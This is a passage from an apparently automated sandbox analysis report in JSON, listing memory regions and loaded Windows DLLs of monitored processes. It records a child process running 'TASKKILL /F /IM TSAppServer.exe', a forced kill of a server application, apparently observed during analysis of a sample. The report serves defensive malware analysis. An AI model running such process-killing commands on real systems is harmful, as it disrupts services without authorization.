monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_4727", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:35.750", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_4728", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:35.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_4729", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:35.753", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_4730", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:35.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_4731", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:35.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_4732", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:35.754", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_4733", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:35.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_4734", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:35.755", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_4735", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:35.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_4736", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:35.756", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_4737", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:35.757", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4738", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:35.757", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6979583, "entry_point": 0, "filename": null, "id": "region_4739", "name": "pagefile_0x0000000000520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5373952, "timestamp": "00:01:35.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_4740", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:01:35.774", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_4741", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:01:35.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 225279, "entry_point": 0, "filename": null, "id": "region_4742", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:35.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 466943, "entry_point": 0, "filename": null, "id": "region_4743", "name": "pagefile_0x0000000000070000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 458752, "timestamp": "00:01:35.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 540671, "entry_point": 524288, "filename": "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui", "id": "region_4744", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 524288, "timestamp": "00:01:35.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 593919, "entry_point": 0, "filename": null, "id": "region_4745", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:35.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_4746", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:35.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_4747", "name": "pagefile_0x0000000000160000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:35.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1835007, "entry_point": 0, "filename": null, "id": "region_4748", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:35.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1835008, "type": "region", "version": 1 }, "end_va": 2097151, "entry_point": 0, "filename": null, "id": "region_4749", "name": "private_0x00000000001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1835008, "timestamp": "00:01:35.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3801087, "entry_point": 3014656, "filename": "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui", "id": "region_4750", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 3014656, "timestamp": "00:01:35.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8257536, "type": "region", "version": 1 }, "end_va": 9834495, "entry_point": 0, "filename": null, "id": "region_4751", "name": "pagefile_0x00000000007e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8257536, "timestamp": "00:01:35.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10092544, "type": "region", "version": 1 }, "end_va": 10354687, "entry_point": 0, "filename": null, "id": "region_4752", "name": "private_0x00000000009a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 10092544, "timestamp": "00:01:35.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 15597568, "type": "region", "version": 1 }, "end_va": 36569087, "entry_point": 0, "filename": null, "id": "region_4753", "name": "pagefile_0x0000000000ee0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15597568, "timestamp": "00:01:35.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984495616, "type": "region", "version": 1 }, "end_va": 1985032191, "entry_point": 1984504786, "filename": "\\Windows\\SysWOW64\\clbcatq.dll", "id": "region_4754", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\syswow64\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984495616, "timestamp": "00:01:35.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130542592, "type": "region", "version": 1 }, "end_va": 2130554879, "entry_point": 0, "filename": null, "id": "region_4755", "name": "private_0x000000007efd8000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130542592, "timestamp": "00:01:35.877", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_4756", "name": "pagefile_0x0000000000170000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1507328, "timestamp": "00:01:35.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1958150144, "type": "region", "version": 1 }, "end_va": 1958526975, "entry_point": 1958292296, "filename": "\\Windows\\SysWOW64\\wbemcomn.dll", "id": "region_4757", "name": "wbemcomn.dll", "norm_filename": "c:\\windows\\syswow64\\wbemcomn.dll", "region_type": "memory_mapped_file", "start_va": 1958150144, "timestamp": "00:01:35.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959043071, "entry_point": 1959007386, "filename": "\\Windows\\SysWOW64\\wbem\\wbemprox.dll", "id": "region_4758", "name": "wbemprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemprox.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:35.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 11206655, "entry_point": 0, "filename": null, "id": "region_4759", "name": "private_0x0000000000a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 10944512, "timestamp": "00:01:35.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 11206656, "type": "region", "version": 1 }, "end_va": 12255231, "entry_point": 0, "filename": null, "id": "region_4760", "name": "private_0x0000000000ab0000", "norm_filename": null, "region_type": "private_memory", "start_va": 11206656, "timestamp": "00:01:35.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 167936, "start_va": 1958739968, "type": "region", "version": 1 }, "end_va": 1958907903, "entry_point": 1958767385, "filename": "\\Windows\\SysWOW64\\winsta.dll", "id": "region_4761", "name": "winsta.dll", "norm_filename": "c:\\windows\\syswow64\\winsta.dll", "region_type": "memory_mapped_file", "start_va": 1958739968, "timestamp": "00:01:35.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4521984, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_4762", "name": "private_0x0000000000450000", "norm_filename": null, "region_type": "private_memory", "start_va": 4521984, "timestamp": "00:01:35.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 10616832, "type": "region", "version": 1 }, "end_va": 10878975, "entry_point": 0, "filename": null, "id": "region_4763", "name": "private_0x0000000000a20000", "norm_filename": null, "region_type": "private_memory", "start_va": 10616832, "timestamp": "00:01:35.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 12255232, "type": "region", "version": 1 }, "end_va": 15200255, "entry_point": 12255232, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_4764", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 12255232, "timestamp": "00:01:35.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 241664, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950986239, "entry_point": 1950749325, "filename": "\\Windows\\SysWOW64\\rsaenh.dll", "id": "region_4765", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\syswow64\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:35.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1956511744, "type": "region", "version": 1 }, "end_va": 1956601855, "entry_point": 1956523459, "filename": "\\Windows\\SysWOW64\\cryptsp.dll", "id": "region_4766", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\syswow64\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1956511744, "timestamp": "00:01:35.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130530304, "type": "region", "version": 1 }, "end_va": 2130542591, "entry_point": 0, "filename": null, "id": "region_4767", "name": "private_0x000000007efd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130530304, "timestamp": "00:01:35.901", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956503551, "entry_point": 1956450869, "filename": "\\Windows\\SysWOW64\\RpcRtRemote.dll", "id": "region_4768", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:01:35.904", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_4769", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4390911, "entry_point": 0, "filename": null, "id": "region_4770", "name": "private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 36700160, "type": "region", "version": 1 }, "end_va": 36962303, "entry_point": 0, "filename": null, "id": "region_4771", "name": "private_0x0000000002300000", "norm_filename": null, "region_type": "private_memory", "start_va": 36700160, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37617663, "entry_point": 0, "filename": null, "id": "region_4772", "name": "private_0x00000000023a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37355520, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1958674432, "type": "region", "version": 1 }, "end_va": 1958735871, "entry_point": 1958683040, "filename": "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll", "id": "region_4773", "name": "wbemsvc.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\wbemsvc.dll", "region_type": "memory_mapped_file", "start_va": 1958674432, "timestamp": "00:01:35.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130354176, "type": "region", "version": 1 }, "end_va": 2130366463, "entry_point": 0, "filename": null, "id": "region_4774", "name": "private_0x000000007efaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130354176, "timestamp": "00:01:35.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130366464, "type": "region", "version": 1 }, "end_va": 2130378751, "entry_point": 0, "filename": null, "id": "region_4775", "name": "private_0x000000007efad000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130366464, "timestamp": "00:01:35.968", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 614400, "start_va": 1787297792, "type": "region", "version": 1 }, "end_va": 1787912191, "entry_point": 1787427001, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4776", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1787297792, "timestamp": "00:01:35.975", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958641663, "entry_point": 1958548277, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4777", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:35.976", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM TSAppServer.exe /IM TSAppServer.exe", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_41", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 41, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4778", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:36.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4779", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:36.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4780", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:36.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4781", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4782", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 983039, "entry_point": 0, "filename": null, "id": "region_4783", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2293759, "entry_point": 0, "filename": null, "id": "region_4784", "name": "private_0x00000000001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2031616, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3760127, "entry_point": 3693705, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4785", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 3670016, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4786", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:36.233", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 